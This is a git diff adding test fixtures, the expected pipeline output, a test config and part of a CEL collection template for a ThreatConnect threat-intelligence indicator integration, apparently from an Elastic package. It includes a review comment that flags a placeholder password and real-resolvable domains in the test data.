"HKEY_LOCAL_MACHINE\\SYSTEM\\Setup\\Status\\ChildCompletion","Value Name": "0","Value Type": "REG_QWORD","AS Number": "ASN1234","address": "johnxyz@newnime.com","User Agent String": "PostmanRuntime/7.32.3","ownerId": 1,"ownerName": "DemoOrganization","dateAdded": "2021-11-02T13:07:08Z","webLink": "https://app.threatconnect.com/#/details/indicators/10/overview","privateFlag": false,"active": true,"activeLocked": false,"legacyLink": "https://app.threatconnect.com/auth/indicators/details/file.xhtml?file=F5A2496CF66CB8CFFE66CB1B27D7DEDE&owner=Demo+Organization","Hashtag": "#testabc","rating": 3,"Mutex": "Test.Mutex()","dnsActive": false,"whoisActive": true,"externalDateAdded": "2023-10-04T12:34:56Z","externalDateExpires": "2023-10-04T12:34:56Z","externalLastModified": "2023-10-04T12:34:56Z","firstSeen": "2023-10-04T12:34:56Z","lastSeen": "2023-10-04T12:34:56Z"}]},"attributes": {"data": [{"id": 6843246,"dateAdded": "2023-08-25T13:16:12Z","type": 
"EmailAddressUsage","value": "PhishingEmailSender","createdBy": {"id": 69,"userName": "johnxys@abc.co","firstName": "John","lastName": "Smith","pseudonym": "JohnS","owner": "Elastic"},"lastModified": "2023-08-25T13:16:12Z","pinned": false,"default": false}]},"address": "hohnabc@xyz.com","legacyLink": "https://partnerstage-intel.threatconnect.com/auth/indicators/details/emailaddress.xhtml?emailaddress=misoyil388%40poverts.com&owner=Elastic","associatedArtifacts": {"data": [{"id": 12345}]},"associatedCases": {"data": [{"id": 123457}]},"fileActions": {"data": [{"id": 123456}]},"fileOccurrences": {"data": [{"fileName": "win999301.dll","path": "C:\\Windows\\System","date": "2022-06-14T10:00:00Z"}]},"customAssociations": {"data": [{"id": 123458}]},"dnsResolution": {"data": [{"id": 123459}]},"enrichment": {"data": [{"id": 123455}]},"falsePositives": 1,"lastFalsePositive": "2023-10-04T12:34:56Z","falsePositiveReportedByUser": false,"genericCustomIndicatorValues": {"data": [{"id": 1234551}]},"geoLocation": {"data": [{"id": 1234552}]},"investigationLinks": {"data": [{"id": 1234553}]},"observations": {"data": [{"id": 1234556}]},"trackedUsers": {"data": [{"id": 1234557}]},"whoIs": {"data": [{"id": 1234558}]}} diff --git a/packages/ti_threatconnect/data_stream/indicator/_dev/test/pipeline/test-indicator.log-expected.json b/packages/ti_threatconnect/data_stream/indicator/_dev/test/pipeline/test-indicator.log-expected.json new file mode 100644 index 00000000000..6608d11900c --- /dev/null +++ b/packages/ti_threatconnect/data_stream/indicator/_dev/test/pipeline/test-indicator.log-expected.json 
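Review bot: The fixture's `associatedGroups.data[0]` object carries a plaintext credential field, `"password": "duwyhfsjhsi"`, and the expected output generated for this same input keeps it verbatim under `threat_connect.indicator.associated_groups.data.password`, so the pipeline currently indexes whatever the upstream API returns in that field as a plain, searchable value. Presumably this is the password of a password-protected document/sample attached to the group (to be confirmed against the ThreatConnect API), but either way it is secret material that does not belong in an indicator index; I would add a `remove` processor for that key (with `ignore_missing: true`) in the ingest pipeline and keep this fixture so the expected output pins the redaction, or record in the field docs why it must be retained. Independently, the fixture uses real-resolvable mailboxes and domains (`johnsmithxyz@gmail.com`, `poverts.com`, `newnime.com`, `abc.co`); test data should use reserved RFC 2606 names such as `example.com` so nothing in the repo points at an address someone could own. The fixture is a single NDJSON line, so all of the above applies to that one record.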
@@ -0,0 +1,553 @@ +{ + "expected": [ + { + "@timestamp": "2023-12-01T08:26:48.000Z", + "ecs": { + "version": "8.11.0" + }, + "email": { + "from": { + "address": [ + "auto-confirm@bad.com" + ] + }, + "subject": "Spam", + "to": { + "address": [ + "demo@sample.com" + ] + } + }, + "event": { + "category": [ + "threat" + ], + "id": "johnbae@poverts.com", + "kind": "enrichment", + "original": "{\"id\": 891599,\"dateAdded\": \"2023-08-25T12:57:24Z\",\"description\": \"bad email\",\"securityLabels\": {\"data\": [{\"id\": 3,\"name\": \"TLP:AMBER\",\"source\": \"https://fp.tools/api/v4/indicators/attribute/pN0psYjPUQ6a_sxPSW5XjQ\",\"description\": \"Thissecuritylabelisusedforinformationthatrequiressupporttobeeffectivelyactedupon,yetcarriesriskstoprivacy,reputation,oroperationsifsharedoutsideoftheorganizationsinvolved.Informationwiththislabelcanbesharedwithmembersofanorganizationanditsclients.\",\"color\": \"FFC000\",\"owner\": \"System\",\"dateAdded\": \"2016-08-31T00:00:00Z\"}]},\"ownerId\": 51,\"ownerName\": \"Elastic\",\"webLink\": \"https://partnerstage-intel.threatconnect.com/\",\"tags\": {\"data\": [{\"id\": 1,\"name\": \"userexecution:maliciouslink\",\"lastUsed\": \"2023-08-25T13:15:30Z\",\"description\": \"ApplythisTagtoobjectsrelatedtoransomwareattacks\",\"owner\": \"Demoorganization\",\"techniqueId\": \"T1055.005\",\"platforms\": {\"data\": [\"Windows\"],\"count\": 1}}]},\"type\": \"EmailAddress\",\"lastModified\": \"2023-12-01T08:26:48Z\",\"rating\": 3,\"confidence\": 61,\"threatAssessRating\": 3,\"threatAssessConfidence\": 61,\"threatAssessScore\": 382,\"threatAssessScoreObserved\": 0,\"threatAssessScoreFalsePositive\": 0,\"summary\": \"johnbae@poverts.com\",\"privateFlag\": false,\"active\": true,\"activeLocked\": false,\"Key Name\": \"HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\Setup\\\\Status\\\\ChildCompletion\",\"Value Name\": \"0\",\"Value Type\": \"REG_QWORD\",\"AS Number\": \"ASN1234\",\"md5\": \"F5A2496CF66CXXCFFE66CXXB27D7XXXX\",\"sha256\": 
\"7D5FFFBFE8D098E369466164F705B4D692517A2B4659A03901DAF67CF78XXXXX\",\"sha1\": \"samplesha1\",\"hostName\": \"samplehost\",\"size\": 123,\"ip\": \"0.0.0.0\",\"text\": \"http://www.testingmcafeesites.com/tes_pc.html\",\"firstSeen\": \"2023-10-04T12:34:56Z\",\"lastSeen\": \"2023-10-04T12:34:56Z\",\"Hashtag\": \"#testabc\",\"Mutex\": \"Test.Mutex()\",\"dnsActive\": false,\"whoisActive\": true,\"Subject\": \"Spam\",\"source\": \"https://fp.tools/api/v4/indicators/attribute/pN0psYjPUQ6a_sxXXXXX\",\"externalDateAdded\": \"2023-10-04T12:34:56Z\",\"externalDateExpires\": \"2023-10-04T12:34:56Z\",\"externalLastModified\": \"2023-10-04T12:34:56Z\",\"Block\": \"0.0.0.0\",\"User Agent String\": \"PostmanRuntime/7.32.3\",\"associatedGroups\": {\"data\": [{\"id\": 6,\"ownerId\": 51,\"ownerName\": \"DemoOrganization\",\"dateAdded\": \"2021-11-03T14:57:45Z\",\"webLink\": \"https://app.threatconnect.com/#/details/groups/3/overview\",\"type\": \"Incident\",\"name\": \"BadIncident\",\"createdBy\": {\"userName\": \"johnsmithxyz@gmail.com\",\"firstName\": \"john\",\"lastName\": \"smith\",\"pseudonym\": \"jsmithAPI\",\"owner\": \"DemoOrganization\",\"id\": 3},\"upVoteCount\": \"0\",\"downVoteCount\": \"0\",\"generatedReport\": true,\"password\": \"duwyhfsjhsi\",\"malware\": true,\"lastModified\": \"2021-10-21T19:54:59Z\",\"legacyLink\": \"https://app.threatconnect.com/auth/document/document.xhtml?document=10\",\"to\": \"demo@sample.com\",\"from\": \"auto-confirm@bad.com\",\"subject\": \"YourAmazon.comorderfordemo@sample.com\",\"header\": \"emailheadergoeshere\",\"body\": \"Pleasevisitbad.comtoseeyourorderandgiveusallyourmoney\",\"scoreIncludesBody\": true,\"emailDate\": \"2021-09-17T12:50:19Z\",\"scoreBreakdown\": \"RuleSPFNeutralwasmatchedagainst'neutral'.\",\"eventDate\": \"2021-09-17T12:50:19Z\",\"status\": \"New\",\"publishDate\": \"2021-09-17T12:50:19Z\",\"fileText\": \"Filetext\",\"assignments\": {\"data\": [{\"type\": \"Assigned\",\"user\": {\"id\": 12}}]},\"dueDate\": 
\"2021-09-17T12:50:19Z\",\"escalationDate\": \"2021-09-17T12:50:19Z\",\"reminderDate\": \"2021-09-17T12:50:19Z\",\"externalDateAdded\": \"2021-09-17T12:50:19Z\",\"externalDateExpires\": \"2021-09-17T12:50:19Z\",\"externalLastModified\": \"2021-09-17T12:50:19Z\",\"firstSeen\": \"2021-09-17T12:50:19Z\",\"lastSeen\": \"2021-09-17T12:50:19Z\",\"xid\": \"a1a1a1a1-a1a1-a1a1-a1a1-a1a1a1a1a1a1\",\"upVote\": false,\"fileName\": \"indicators.txt\",\"fileSize\": 36,\"documentType\": \"Text\",\"documentDateAdded\": \"2021-10-21T19:54:59Z\",\"fileType\": \"Hash\"}]},\"associatedIndicators\": {\"data\": [{\"lastModified\": \"2021-11-02T13:07:08Z\",\"description\": \"A bad email found\",\"Subject\": \"Spam\",\"id\": 10,\"md5\": \"F5A2496CF66CB8CFFE66CB1B27DXXXXX\",\"sha256\": \"7D5FFFBFE8D098E369466164F705B4D692517A2B4659A03901DAF67CF78XXXXX\",\"sha1\": \"samplesha1\",\"size\": 124,\"Block\": \"0.0.0.0\",\"hostName\": \"samplehost\",\"type\": \"File\",\"summary\": \"F5A2496CF66CB8CFFE66CB1B27D7DEDE\",\"confidence\": 20,\"ip\": \"0.0.0.0\",\"text\": \"http://www.testingmcafeesites.com/test_pc.html\",\"Key Name\": \"HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\Setup\\\\Status\\\\ChildCompletion\",\"Value Name\": \"0\",\"Value Type\": \"REG_QWORD\",\"AS Number\": \"ASN1234\",\"address\": \"johnxyz@newnime.com\",\"User Agent String\": \"PostmanRuntime/7.32.3\",\"ownerId\": 1,\"ownerName\": \"DemoOrganization\",\"dateAdded\": \"2021-11-02T13:07:08Z\",\"webLink\": \"https://app.threatconnect.com/#/details/indicators/10/overview\",\"privateFlag\": false,\"active\": true,\"activeLocked\": false,\"legacyLink\": \"https://app.threatconnect.com/auth/indicators/details/file.xhtml?file=F5A2496CF66CB8CFFE66CB1B27D7DEDE&owner=Demo+Organization\",\"Hashtag\": \"#testabc\",\"rating\": 3,\"Mutex\": \"Test.Mutex()\",\"dnsActive\": false,\"whoisActive\": true,\"externalDateAdded\": \"2023-10-04T12:34:56Z\",\"externalDateExpires\": \"2023-10-04T12:34:56Z\",\"externalLastModified\": 
\"2023-10-04T12:34:56Z\",\"firstSeen\": \"2023-10-04T12:34:56Z\",\"lastSeen\": \"2023-10-04T12:34:56Z\"},{\"lastModified\": \"2021-11-02T13:07:08Z\",\"description\": \"A bad email found\",\"Subject\": \"Spam\",\"id\": 11,\"md5\": \"F5A2496CF66CB8CFFE66CB1B27DXXXXX\",\"sha256\": \"7D5FFFBFE8D098E369466164F705B4D692517A2B4659A03901DAF67CF78XXXXX\",\"sha1\": \"samplesha1\",\"size\": \"124\",\"Block\": \"0.0.0.0/8\",\"hostName\": \"samplehost\",\"type\": \"File\",\"summary\": \"F5A2496CF66CB8CFFE66CB1B27D7DEDE\",\"confidence\": 20,\"ip\": \"0.0.0.0\",\"text\": \"http://www.testingmcafeesites.com/test_pc.html\",\"Key Name\": \"HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\Setup\\\\Status\\\\ChildCompletion\",\"Value Name\": \"0\",\"Value Type\": \"REG_QWORD\",\"AS Number\": \"ASN1234\",\"address\": \"johnxyz@newnime.com\",\"User Agent String\": \"PostmanRuntime/7.32.3\",\"ownerId\": 1,\"ownerName\": \"DemoOrganization\",\"dateAdded\": \"2021-11-02T13:07:08Z\",\"webLink\": \"https://app.threatconnect.com/#/details/indicators/10/overview\",\"privateFlag\": false,\"active\": true,\"activeLocked\": false,\"legacyLink\": \"https://app.threatconnect.com/auth/indicators/details/file.xhtml?file=F5A2496CF66CB8CFFE66CB1B27D7DEDE&owner=Demo+Organization\",\"Hashtag\": \"#testabc\",\"rating\": 3,\"Mutex\": \"Test.Mutex()\",\"dnsActive\": false,\"whoisActive\": true,\"externalDateAdded\": \"2023-10-04T12:34:56Z\",\"externalDateExpires\": \"2023-10-04T12:34:56Z\",\"externalLastModified\": \"2023-10-04T12:34:56Z\",\"firstSeen\": \"2023-10-04T12:34:56Z\",\"lastSeen\": \"2023-10-04T12:34:56Z\"},{\"lastModified\": \"2021-11-02T13:07:08Z\",\"description\": \"A bad email found\",\"Subject\": \"Spam\",\"id\": 12,\"md5\": \"F5A2496CF66CB8CFFE66CB1B27DXXXXX\",\"sha256\": \"7D5FFFBFE8D098E369466164F705B4D692517A2B4659A03901DAF67CF78XXXXX\",\"sha1\": \"samplesha1\",\"size\": \"124\",\"Block\": \"0.0.0.0/125\",\"hostName\": \"samplehost\",\"type\": \"File\",\"summary\": 
\"F5A2496CF66CB8CFFE66CB1B27D7DEDE\",\"confidence\": 20,\"ip\": \"0.0.0.0\",\"text\": \"http://www.testingmcafeesites.com/test_pc.html\",\"Key Name\": \"HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\Setup\\\\Status\\\\ChildCompletion\",\"Value Name\": \"0\",\"Value Type\": \"REG_QWORD\",\"AS Number\": \"ASN1234\",\"address\": \"johnxyz@newnime.com\",\"User Agent String\": \"PostmanRuntime/7.32.3\",\"ownerId\": 1,\"ownerName\": \"DemoOrganization\",\"dateAdded\": \"2021-11-02T13:07:08Z\",\"webLink\": \"https://app.threatconnect.com/#/details/indicators/10/overview\",\"privateFlag\": false,\"active\": true,\"activeLocked\": false,\"legacyLink\": \"https://app.threatconnect.com/auth/indicators/details/file.xhtml?file=F5A2496CF66CB8CFFE66CB1B27D7DEDE&owner=Demo+Organization\",\"Hashtag\": \"#testabc\",\"rating\": 3,\"Mutex\": \"Test.Mutex()\",\"dnsActive\": false,\"whoisActive\": true,\"externalDateAdded\": \"2023-10-04T12:34:56Z\",\"externalDateExpires\": \"2023-10-04T12:34:56Z\",\"externalLastModified\": \"2023-10-04T12:34:56Z\",\"firstSeen\": \"2023-10-04T12:34:56Z\",\"lastSeen\": \"2023-10-04T12:34:56Z\"}]},\"attributes\": {\"data\": [{\"id\": 6843246,\"dateAdded\": \"2023-08-25T13:16:12Z\",\"type\": \"EmailAddressUsage\",\"value\": \"PhishingEmailSender\",\"createdBy\": {\"id\": 69,\"userName\": \"johnxys@abc.co\",\"firstName\": \"John\",\"lastName\": \"Smith\",\"pseudonym\": \"JohnS\",\"owner\": \"Elastic\"},\"lastModified\": \"2023-08-25T13:16:12Z\",\"pinned\": false,\"default\": false}]},\"address\": \"hohnabc@xyz.com\",\"legacyLink\": \"https://partnerstage-intel.threatconnect.com/auth/indicators/details/emailaddress.xhtml?emailaddress=misoyil388%40poverts.com&owner=Elastic\",\"associatedArtifacts\": {\"data\": [{\"id\": 12345}]},\"associatedCases\": {\"data\": [{\"id\": 123457}]},\"fileActions\": {\"data\": [{\"id\": 123456}]},\"fileOccurrences\": {\"data\": [{\"fileName\": \"win999301.dll\",\"path\": \"C:\\\\Windows\\\\System\",\"date\": 
\"2022-06-14T10:00:00Z\"}]},\"customAssociations\": {\"data\": [{\"id\": 123458}]},\"dnsResolution\": {\"data\": [{\"id\": 123459}]},\"enrichment\": {\"data\": [{\"id\": 123455}]},\"falsePositives\": 1,\"lastFalsePositive\": \"2023-10-04T12:34:56Z\",\"falsePositiveReportedByUser\": false,\"genericCustomIndicatorValues\": {\"data\": [{\"id\": 1234551}]},\"geoLocation\": {\"data\": [{\"id\": 1234552}]},\"investigationLinks\": {\"data\": [{\"id\": 1234553}]},\"observations\": {\"data\": [{\"id\": 1234556}]},\"trackedUsers\": {\"data\": [{\"id\": 1234557}]},\"whoIs\": {\"data\": [{\"id\": 1234558}]}}", + "type": [ + "indicator" + ] + }, + "observer": { + "hostname": "samplehost" + }, + "os": { + "family": [ + "Windows" + ] + }, + "related": { + "hash": [ + "F5A2496CF66CXXCFFE66CXXB27D7XXXX", + "samplesha1", + "7D5FFFBFE8D098E369466164F705B4D692517A2B4659A03901DAF67CF78XXXXX" + ], + "hosts": [ + "samplehost" + ], + "ip": [ + "0.0.0.0" + ], + "user": [ + "hohnabc", + "john", + "smith", + "johnsmithxyz@gmail.com", + "John", + "Smith", + "johnxys@abc.co" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "indicator": { + "as": { + "number": 1234 + }, + "confidence": "Medium", + "description": "bad email", + "email": { + "address": "hohnabc@xyz.com" + }, + "first_seen": "2023-10-04T12:34:56.000Z", + "last_seen": "2023-10-04T12:34:56.000Z", + "marking": { + "tlp": [ + "AMBER" + ] + }, + "modified_at": "2023-10-04T12:34:56.000Z", + "provider": "ThreatConnect", + "reference": [ + "https://partnerstage-intel.threatconnect.com/auth/indicators/details/emailaddress.xhtml?emailaddress=misoyil388%40poverts.com&owner=Elastic", + "https://partnerstage-intel.threatconnect.com/" + ], + "type": [ + "email-addr" + ] + }, + "technique": { + "id": [ + "T1055.005" + ] + } + }, + "threat_connect": { + "indicator": { + "active": { + "locked": false, + "value": true + }, + "address": "hohnabc@xyz.com", + "as_number": "ASN1234", + "associated_artifacts": { + "data": [ + { + 
"id": 12345 + } + ] + }, + "associated_cases": { + "data": [ + { + "id": 123457 + } + ] + }, + "associated_groups": { + "data": [ + { + "assignments": { + "data": [ + { + "type": "Assigned", + "user": { + "id": "12" + } + } + ] + }, + "body": "Pleasevisitbad.comtoseeyourorderandgiveusallyourmoney", + "created_by": { + "first_name": "john", + "id": "3", + "last_name": "smith", + "owner": "DemoOrganization", + "pseudonym": "jsmithAPI", + "user_name": "johnsmithxyz@gmail.com" + }, + "date_added": "2021-11-03T14:57:45.000Z", + "document": { + "date_added": "2021-10-21T19:54:59.000Z", + "type": "Text" + }, + "down_vote_count": "0", + "due_date": "2021-09-17T12:50:19.000Z", + "email_date": "2021-09-17T12:50:19.000Z", + "escalation_date": "2021-09-17T12:50:19.000Z", + "event_date": "2021-09-17T12:50:19.000Z", + "external": { + "date": { + "added": "2021-09-17T12:50:19.000Z", + "expires": "2021-09-17T12:50:19.000Z" + }, + "last_modified": "2021-09-17T12:50:19.000Z" + }, + "file": { + "name": "indicators.txt", + "size": "36", + "text": "Filetext", + "type": "Hash" + }, + "first_seen": "2021-09-17T12:50:19.000Z", + "generated_report": true, + "header": "emailheadergoeshere", + "id": "6", + "last_modified": "2021-10-21T19:54:59.000Z", + "last_seen": "2021-09-17T12:50:19.000Z", + "legacy_link": "https://app.threatconnect.com/auth/document/document.xhtml?document=10", + "malware": true, + "name": "BadIncident", + "owner": { + "id": "51", + "name": "DemoOrganization" + }, + "password": "duwyhfsjhsi", + "publish_date": "2021-09-17T12:50:19.000Z", + "reminder_date": "2021-09-17T12:50:19.000Z", + "score_breakdown": "RuleSPFNeutralwasmatchedagainst'neutral'.", + "score_includes_body": true, + "status": "New", + "subject": "YourAmazon.comorderfordemo@sample.com", + "type": "Incident", + "up_vote": false, + "up_vote_count": "0", + "web_link": "https://app.threatconnect.com/#/details/groups/3/overview", + "xid": "a1a1a1a1-a1a1-a1a1-a1a1-a1a1a1a1a1a1" + } + ] + }, + 
"associated_indicators": { + "data": [ + { + "active": { + "locked": false, + "value": true + }, + "address": "johnxyz@newnime.com", + "as_number": "ASN1234", + "block": "0.0.0.0", + "confidence": 20, + "date_added": "2021-11-02T13:07:08.000Z", + "description": "A bad email found", + "dns_active": false, + "external": { + "date": { + "added": "2023-10-04T12:34:56.000Z", + "expires": "2023-10-04T12:34:56.000Z" + }, + "last_modified": "2023-10-04T12:34:56.000Z" + }, + "first_seen": "2023-10-04T12:34:56.000Z", + "hashtag": "#testabc", + "host_name": "samplehost", + "id": "10", + "ip": "0.0.0.0", + "key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\Setup\\Status\\ChildCompletion", + "last_modified": "2021-11-02T13:07:08.000Z", + "last_seen": "2023-10-04T12:34:56.000Z", + "legacy_link": "https://app.threatconnect.com/auth/indicators/details/file.xhtml?file=F5A2496CF66CB8CFFE66CB1B27D7DEDE&owner=Demo+Organization", + "md5": "F5A2496CF66CB8CFFE66CB1B27DXXXXX", + "mutex": "Test.Mutex()", + "owner": { + "id": "1", + "name": "DemoOrganization" + }, + "private_flag": false, + "rating": 3.0, + "sha1": "samplesha1", + "sha256": "7D5FFFBFE8D098E369466164F705B4D692517A2B4659A03901DAF67CF78XXXXX", + "size": "124", + "subject": "Spam", + "summary": "F5A2496CF66CB8CFFE66CB1B27D7DEDE", + "text": "http://www.testingmcafeesites.com/test_pc.html", + "type": "File", + "user_agent_string": "PostmanRuntime/7.32.3", + "value": { + "name": "0", + "type": "REG_QWORD" + }, + "web_link": "https://app.threatconnect.com/#/details/indicators/10/overview", + "whois_active": true + }, + { + "active": { + "locked": false, + "value": true + }, + "address": "johnxyz@newnime.com", + "as_number": "ASN1234", + "block": "0.0.0.0/8", + "confidence": 20, + "date_added": "2021-11-02T13:07:08.000Z", + "description": "A bad email found", + "dns_active": false, + "external": { + "date": { + "added": "2023-10-04T12:34:56.000Z", + "expires": "2023-10-04T12:34:56.000Z" + }, + "last_modified": "2023-10-04T12:34:56.000Z" + }, 
+ "first_seen": "2023-10-04T12:34:56.000Z", + "hashtag": "#testabc", + "host_name": "samplehost", + "id": "11", + "ip": "0.0.0.0", + "key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\Setup\\Status\\ChildCompletion", + "last_modified": "2021-11-02T13:07:08.000Z", + "last_seen": "2023-10-04T12:34:56.000Z", + "legacy_link": "https://app.threatconnect.com/auth/indicators/details/file.xhtml?file=F5A2496CF66CB8CFFE66CB1B27D7DEDE&owner=Demo+Organization", + "md5": "F5A2496CF66CB8CFFE66CB1B27DXXXXX", + "mutex": "Test.Mutex()", + "owner": { + "id": "1", + "name": "DemoOrganization" + }, + "private_flag": false, + "rating": 3.0, + "sha1": "samplesha1", + "sha256": "7D5FFFBFE8D098E369466164F705B4D692517A2B4659A03901DAF67CF78XXXXX", + "size": "124", + "subject": "Spam", + "summary": "F5A2496CF66CB8CFFE66CB1B27D7DEDE", + "text": "http://www.testingmcafeesites.com/test_pc.html", + "type": "File", + "user_agent_string": "PostmanRuntime/7.32.3", + "value": { + "name": "0", + "type": "REG_QWORD" + }, + "web_link": "https://app.threatconnect.com/#/details/indicators/10/overview", + "whois_active": true + }, + { + "active": { + "locked": false, + "value": true + }, + "address": "johnxyz@newnime.com", + "as_number": "ASN1234", + "block": "0.0.0.0/125", + "confidence": 20, + "date_added": "2021-11-02T13:07:08.000Z", + "description": "A bad email found", + "dns_active": false, + "external": { + "date": { + "added": "2023-10-04T12:34:56.000Z", + "expires": "2023-10-04T12:34:56.000Z" + }, + "last_modified": "2023-10-04T12:34:56.000Z" + }, + "first_seen": "2023-10-04T12:34:56.000Z", + "hashtag": "#testabc", + "host_name": "samplehost", + "id": "12", + "ip": "0.0.0.0", + "key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\Setup\\Status\\ChildCompletion", + "last_modified": "2021-11-02T13:07:08.000Z", + "last_seen": "2023-10-04T12:34:56.000Z", + "legacy_link": "https://app.threatconnect.com/auth/indicators/details/file.xhtml?file=F5A2496CF66CB8CFFE66CB1B27D7DEDE&owner=Demo+Organization", + "md5": 
"F5A2496CF66CB8CFFE66CB1B27DXXXXX", + "mutex": "Test.Mutex()", + "owner": { + "id": "1", + "name": "DemoOrganization" + }, + "private_flag": false, + "rating": 3.0, + "sha1": "samplesha1", + "sha256": "7D5FFFBFE8D098E369466164F705B4D692517A2B4659A03901DAF67CF78XXXXX", + "size": "124", + "subject": "Spam", + "summary": "F5A2496CF66CB8CFFE66CB1B27D7DEDE", + "text": "http://www.testingmcafeesites.com/test_pc.html", + "type": "File", + "user_agent_string": "PostmanRuntime/7.32.3", + "value": { + "name": "0", + "type": "REG_QWORD" + }, + "web_link": "https://app.threatconnect.com/#/details/indicators/10/overview", + "whois_active": true + } + ] + }, + "attributes": { + "data": [ + { + "created_by": { + "first_name": "John", + "id": "69", + "last_name": "Smith", + "owner": "Elastic", + "pseudonym": "JohnS", + "user_name": "johnxys@abc.co" + }, + "date_added": "2023-08-25T13:16:12.000Z", + "default": false, + "id": "6843246", + "last_modified": "2023-08-25T13:16:12.000Z", + "pinned": false, + "type": "EmailAddressUsage", + "value": "PhishingEmailSender" + } + ] + }, + "block": "0.0.0.0", + "confidence": 61, + "custom_associations": { + "data": [ + { + "id": 123458 + } + ] + }, + "date_added": "2023-08-25T12:57:24.000Z", + "description": "bad email", + "dns_active": false, + "dns_resolution": { + "data": [ + { + "id": 123459 + } + ] + }, + "enrichment": { + "data": [ + { + "id": 123455 + } + ] + }, + "external": { + "date": { + "added": "2023-10-04T12:34:56.000Z", + "expires": "2023-10-04T12:34:56.000Z" + } + }, + "external_last": { + "modified": "2023-10-04T12:34:56.000Z" + }, + "false_positive_reported_by_user": false, + "false_positives": 1, + "file_actions": { + "data": [ + { + "id": 123456 + } + ] + }, + "file_occurrences": { + "data": [ + { + "date": "2022-06-14T10:00:00Z", + "fileName": "win999301.dll", + "path": "C:\\Windows\\System" + } + ] + }, + "first_seen": "2023-10-04T12:34:56.000Z", + "generic_custom_indicator_values": { + "data": [ + { + "id": 1234551 + } + 
] + }, + "geo_location": { + "data": [ + { + "id": 1234552 + } + ] + }, + "hashtag": "#testabc", + "host_name": "samplehost", + "id": "891599", + "investigation_links": { + "data": [ + { + "id": 1234553 + } + ] + }, + "ip": "0.0.0.0", + "key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\Setup\\Status\\ChildCompletion", + "last_false_positive": "2023-10-04T12:34:56.000Z", + "last_modified": "2023-12-01T08:26:48.000Z", + "last_seen": "2023-10-04T12:34:56.000Z", + "legacy_link": "https://partnerstage-intel.threatconnect.com/auth/indicators/details/emailaddress.xhtml?emailaddress=misoyil388%40poverts.com&owner=Elastic", + "md5": "F5A2496CF66CXXCFFE66CXXB27D7XXXX", + "mutex": "Test.Mutex()", + "observations": { + "data": [ + { + "id": 1234556 + } + ] + }, + "owner": { + "id": "51", + "name": "Elastic" + }, + "private_flag": false, + "rating": 3.0, + "security_labels": { + "data": [ + { + "color": "FFC000", + "date_added": "2016-08-31T00:00:00.000Z", + "description": "Thissecuritylabelisusedforinformationthatrequiressupporttobeeffectivelyactedupon,yetcarriesriskstoprivacy,reputation,oroperationsifsharedoutsideoftheorganizationsinvolved.Informationwiththislabelcanbesharedwithmembersofanorganizationanditsclients.", + "id": "3", + "name": "TLP:AMBER", + "owner": "System", + "source": "https://fp.tools/api/v4/indicators/attribute/pN0psYjPUQ6a_sxPSW5XjQ" + } + ] + }, + "sha1": "samplesha1", + "sha256": "7D5FFFBFE8D098E369466164F705B4D692517A2B4659A03901DAF67CF78XXXXX", + "size": "123", + "source": "https://fp.tools/api/v4/indicators/attribute/pN0psYjPUQ6a_sxXXXXX", + "subject": "Spam", + "summary": "johnbae@poverts.com", + "tags": { + "data": [ + { + "description": "ApplythisTagtoobjectsrelatedtoransomwareattacks", + "id": "1", + "last_used": "2023-08-25T13:15:30.000Z", + "name": "userexecution:maliciouslink", + "owner": "Demoorganization", + "platforms": { + "count": 1, + "data": [ + "Windows" + ] + }, + "technique": { + "id": "T1055.005" + } + } + ] + }, + "text": 
"http://www.testingmcafeesites.com/tes_pc.html", + "threat_assess": { + "confidence": 61.0, + "rating": 3.0, + "score": { + "false_positive": 0, + "observed": 0, + "value": 382 + } + }, + "tracked_users": { + "data": [ + { + "id": 1234557 + } + ] + }, + "type": "EmailAddress", + "user_agent_string": "PostmanRuntime/7.32.3", + "value": { + "name": "0", + "type": "REG_QWORD" + }, + "web_link": "https://partnerstage-intel.threatconnect.com/", + "who_is": { + "data": [ + { + "id": 1234558 + } + ] + }, + "whois_active": true + } + }, + "user": { + "domain": "xyz.com", + "email": "hohnabc@xyz.com", + "name": "hohnabc" + }, + "user_agent": { + "original": "PostmanRuntime/7.32.3" + } + } + ] +} \ No newline at end of file diff --git a/packages/ti_threatconnect/data_stream/indicator/_dev/test/system/test-default-config.yml b/packages/ti_threatconnect/data_stream/indicator/_dev/test/system/test-default-config.yml new file mode 100644 index 00000000000..7c50d5d0e73 --- /dev/null +++ b/packages/ti_threatconnect/data_stream/indicator/_dev/test/system/test-default-config.yml @@ -0,0 +1,13 @@ +input: cel +service: threatconnect-indicator +vars: + url: http://{{Hostname}}:{{Port}} + access_id: "1234" + secret_key: xxxx +data_stream: + vars: + interval: 5m + batch_size: 2 + preserve_original_event: true +assert: + hit_count: 4 diff --git a/packages/ti_threatconnect/data_stream/indicator/agent/stream/cel.yml.hbs b/packages/ti_threatconnect/data_stream/indicator/agent/stream/cel.yml.hbs new file mode 100644 index 00000000000..25b3190b3ed --- /dev/null +++ b/packages/ti_threatconnect/data_stream/indicator/agent/stream/cel.yml.hbs 
@@ -0,0 +1,198 @@ +config_version: 2 +interval: {{interval}} +{{#if enable_request_tracer}} +resource.tracer.filename: "../../logs/cel/http-request-trace-*.ndjson" +request.tracer.maxbackups: 5 +{{/if}} +{{#if proxy_url}} +resource.proxy_url: {{proxy_url}} +{{/if}} +{{#if ioc_expiration_duration}} +fields_under_root: true +fields: + _conf: + ioc_expiration_duration: "{{ioc_expiration_duration}}" +{{/if}} +{{#if ssl}} +resource.ssl: {{ssl}} +{{/if}} +{{#if http_client_timeout}} +resource.timeout: {{http_client_timeout}} +{{/if}} +resource.url: {{url}} +state: + access_id: {{escape_string access_id}} + secret_key: {{escape_string secret_key}} + counter: 0 + want_more: false + batch: {{batch_size}} + initial_interval: {{initial_interval}} + event_list: + - associatedGroups + - associatedIndicators + - attributes + - securityLabels + - sightings + - tags + - threatAssess + tql_filter: {{tql}} +redact: + fields: + - secret_key +program: | + request("GET", ( + !state.want_more ? + state.url + "/api/v3/indicators?" + { + "fields": state.event_list, + "resultStart": ["0"], + "resultLimit": [string(state.batch)], + "sorting": ["lastModified asc"], + "tql": ['lastModified GEQ "'+( + !state.want_more ? + (has(state.cursor) && has(state.cursor.last_timestamp) && state.cursor.last_timestamp != null ? + 